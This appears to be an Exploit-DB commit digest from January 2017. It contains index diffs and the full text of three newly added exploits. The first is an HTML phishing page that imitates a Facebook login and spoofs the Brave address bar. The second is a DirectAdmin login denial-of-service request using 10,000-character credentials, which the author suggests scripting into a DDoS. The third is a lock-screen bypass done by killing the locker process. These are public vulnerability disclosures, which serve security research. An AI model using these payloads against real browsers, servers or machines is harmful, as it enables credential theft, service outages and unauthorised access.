DB: 2017-01-09

3 new exploits

Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing

Advanced Desktop Locker 6.0.0 - Lock Screen Bypass
DirectAdmin 1.28/1.29 - CMD_SHOW_RESELLER user Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_SHOW_USER user Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_TICKET_CREATE TYPE Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_EMAIL_FORWARDER_MODIFY user Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_TICKET type Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_EMAIL_VACATION_MODIFY user Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_EMAIL_LIST name Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - CMD_FTP_SHOW DOMAIN Parameter Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_SHOW_RESELLER' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_SHOW_USER' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_TICKET_CREATE' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_EMAIL_FORWARDER_MODIFY' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_TICKET' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_EMAIL_VACATION_MODIFY' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_EMAIL_LIST' Cross-Site Scripting
DirectAdmin 1.28/1.29 - 'CMD_FTP_SHOW' Cross-Site Scripting

DirectAdmin 1.292 - CMD_USER_STATS Cross-Site Scripting
DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting

DirectAdmin 1.50.1 - Denial of Service

files.csv

@@ -5333,6 +5333,7 @@ id,file,description,date,author,platform,type,port
 40964,platforms/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,windows,dos,0
 40965,platforms/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",windows,dos,0
 40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0
+40994,platforms/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8741,6 +8742,7 @@ id,file,description,date,author,platform,type,port
 40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
 40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
+40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -30159,14 +30161,14 @@ id,file,description,date,author,platform,type,port
 29154,platforms/asp/webapps/29154.txt,"CreaDirectory 1.2 - search.asp category Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0
 29155,platforms/asp/webapps/29155.txt,"CreaDirectory 1.2 - addlisting.asp cat Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0
 28998,platforms/php/webapps/28998.txt,"PHPdebug 1.1 - Debug_test.php Remote File Inclusion",2006-11-12,Firewall,php,webapps,0
-28999,platforms/php/webapps/28999.txt,"DirectAdmin 1.28/1.29 - CMD_SHOW_RESELLER user Parameter Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
-29000,platforms/php/webapps/29000.txt,"DirectAdmin 1.28/1.29 - CMD_SHOW_USER user Parameter Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
-29001,platforms/php/webapps/29001.txt,"DirectAdmin 1.28/1.29 - CMD_TICKET_CREATE TYPE Parameter Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
-29002,platforms/php/webapps/29002.txt,"DirectAdmin 1.28/1.29 - CMD_EMAIL_FORWARDER_MODIFY user Parameter Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
-29003,platforms/php/webapps/29003.txt,"DirectAdmin 1.28/1.29 - CMD_TICKET type Parameter Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
-29004,platforms/php/webapps/29004.txt,"DirectAdmin 1.28/1.29 - CMD_EMAIL_VACATION_MODIFY user Parameter Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
-29005,platforms/php/webapps/29005.txt,"DirectAdmin 1.28/1.29 - CMD_EMAIL_LIST name Parameter Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
-29006,platforms/php/webapps/29006.txt,"DirectAdmin 1.28/1.29 - CMD_FTP_SHOW DOMAIN Parameter Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
+28999,platforms/php/webapps/28999.txt,"DirectAdmin 1.28/1.29 - 'CMD_SHOW_RESELLER' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
+29000,platforms/php/webapps/29000.txt,"DirectAdmin 1.28/1.29 - 'CMD_SHOW_USER' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
+29001,platforms/php/webapps/29001.txt,"DirectAdmin 1.28/1.29 - 'CMD_TICKET_CREATE' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
+29002,platforms/php/webapps/29002.txt,"DirectAdmin 1.28/1.29 - 'CMD_EMAIL_FORWARDER_MODIFY' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
+29003,platforms/php/webapps/29003.txt,"DirectAdmin 1.28/1.29 - 'CMD_TICKET' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
+29004,platforms/php/webapps/29004.txt,"DirectAdmin 1.28/1.29 - 'CMD_EMAIL_VACATION_MODIFY' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
+29005,platforms/php/webapps/29005.txt,"DirectAdmin 1.28/1.29 - 'CMD_EMAIL_LIST' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
+29006,platforms/php/webapps/29006.txt,"DirectAdmin 1.28/1.29 - 'CMD_FTP_SHOW' Cross-Site Scripting",2006-11-12,"Aria-Security Team",php,webapps,0
 29008,platforms/asp/webapps/29008.txt,"FunkyASP Glossary 1.0 - Glossary.asp SQL Injection",2006-11-14,saps.audit,asp,webapps,0
 29009,platforms/asp/webapps/29009.txt,"SitesOutlet eCommerce Kit - Multiple SQL Injections",2006-11-15,"laurent gaffie",asp,webapps,0
 29010,platforms/asp/webapps/29010.txt,"SiteXpress E-Commerce System - Dept.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0
@@ -30702,7 +30704,7 @@ id,file,description,date,author,platform,type,port
 29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client - Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0
 29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 - 'index.php' Remote File Inclusion",2007-03-15,"Abdus Samad",php,webapps,0
 29745,platforms/php/webapps/29745.txt,"Horde Framework 3.1.3 - 'login.php' Cross-Site Scripting",2007-03-15,"Moritz Naumann",php,webapps,0
-29747,platforms/php/webapps/29747.txt,"DirectAdmin 1.292 - CMD_USER_STATS Cross-Site Scripting",2007-03-16,Mandr4ke,php,webapps,0
+29747,platforms/php/webapps/29747.txt,"DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting",2007-03-16,Mandr4ke,php,webapps,0
 29748,platforms/php/webapps/29748.txt,"Holtstraeter Rot 13 - Enkrypt.php Directory Traversal",2007-03-16,"BorN To K!LL",php,webapps,0
 29750,platforms/php/webapps/29750.php,"phpStats 0.1.9 - Multiple SQL Injections",2007-03-16,rgod,php,webapps,0
 29751,platforms/php/webapps/29751.php,"phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0
@@ -36936,3 +36938,4 @@ id,file,description,date,author,platform,type,port
 40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0
 40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0
 40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
+40996,platforms/php/webapps/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,webapps,0

platforms/multiple/dos/40994.html

@@ -0,0 +1,31 @@
+Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address Bar
+spoofing is a critical vulnerability in which any attacker can spoof the
+address bar to a legit looking website but the content of the web-page
+remains different from the Address-Bar display of the site. In Simple
+words, the victim sees a familiar looking URL but the content is not from
+the same URL but the attacker controlled content. Some companies say "We
+recognize that the address bar is the only reliable security indicator in
+modern browsers" .
+Products affected:
+
+   - In IOS - Affected is the Latest Version 1.2.16 (16.09.30.10)
+   - In Android - Affected in Brave Latest version 1.9.56
+
+
+Exploit Code: 
+
+<html>
+<title>Address Bar spoofing Brave</title>
+<h1> This is Dummy Facebook </h1>
+<form>
+Email: <input type="text" name="username" placeholder="add email"><br>
+Password: <input type="text" name="password" placeholder="pass">
+<script>
+function f()
+{
+location = "https://facebook.com"
+}
+setInterval("f()", 10);
+</script>
+</html>
+

platforms/php/webapps/40996.txt

@@ -0,0 +1,70 @@
+#################################
+
+#
+#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
+#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
+#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
+#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
+#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
+#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
+#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
+#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
+#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
+#
+
+#####################################
+
+#####################################
+
+#         Iranian Exploit DataBase
+
+# Directadmin ControlPanel 1.50.1 denial of service Vulnerability
+
+# Directadmin Version : 1.50.1 And Old Version
+
+# Testet On : Centos 6 - Directadmin 1.50.1
+
+# Vendor site : http://www.directadmin.com
+
+# Author : Amir ( iedb.team@gmail.com - https://telegram.me/AmirAm67)
+
+# Site : Www.IeDb.Ir  -  irist.ir   -   xssed.Ir
+
+# Iedb Telegram : https://telegram.me/iedbteam
+
+# Archive Exploit = http://www.iedb.ir/exploits-6517.html
+
+#####################################
+
+Description :
+
+An attacker can send a username and password in the login screen DirectAdmin long,DirectAdmin to disrupt And Crach.
+This problem is present in all versions of DirectAdmin.
+There is no limit on the number of characters entered.
+attacker could write a script to attack DDoS based on the following information:
+
+http://Ip:2222/CMD_LOGIN
+
+POST /CMD_LOGIN HTTP/1.1
+
+referer=%2F&username=$POC&password=$POC
+
+$POC = A * 10000
+
+#####################################
+
+** http://iedb.ir  ==>> Iranian Exploit DataBase And Iranian Security Team
+
+** http://irist.ir  ==>> Register hacked sites
+
+** http://xssed.Ir  ==>>  Sign vulnerable sites ( xss and sql ) (Vulnerability attack information site)
+
+Thanks to : C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck M4n,black_security,Yasser,Ramin Assadian,Black_Nofuzi,SecureHost,1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb,Khashayar,B3hz4d4,Shabgard,Cl09er,Ramin Asadyan,
+
+Be_lucky,Moslem Haghighian,Dr_Iman,8Bit,Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellshock3 And all my friends And All Member In Iedb.Ir Team
+
+#####################################
+
+#  Archive Exploit = http://www.iedb.ir/exploits-6517.html
+
+#####################################

platforms/windows/local/40995.txt

@@ -0,0 +1,29 @@
+Exploit Title : Advanced Desktop Locker [ Locker Bypass ]
+# Date: 8 - 1 - 2017
+# Software Link: http://www.encrypt4all.com/products/advanced-desktop-locker-information.php
+# Sofrware Version : 6.0.0
+# Exploit Author: Squnity | Sir.matrix
+# Contact: secfathy@squnity.com
+# Website: https://www.squnity.com
+# Category: windows
+
+1. Description
+
+This Application Developed To Lock Desktop Control When User Download Files
+Or Anywhere
+I Can Kill TASK TO Bypass This Application
+
+
+2. Proof of Concept
+
+- Lock Your Desktop With ADL
+- Click on Ctrl + R [ Run Shortcut ]
+- Write CMD & Write taskmgr
+- When Task Manager Open , Select ADL Prossess And Click Delete To Kill
+- Exploited
+
+
+POC Video :
+
+
+https://www.youtube.com/watch?v=UXjHwzz2sEo&feature=youtu.be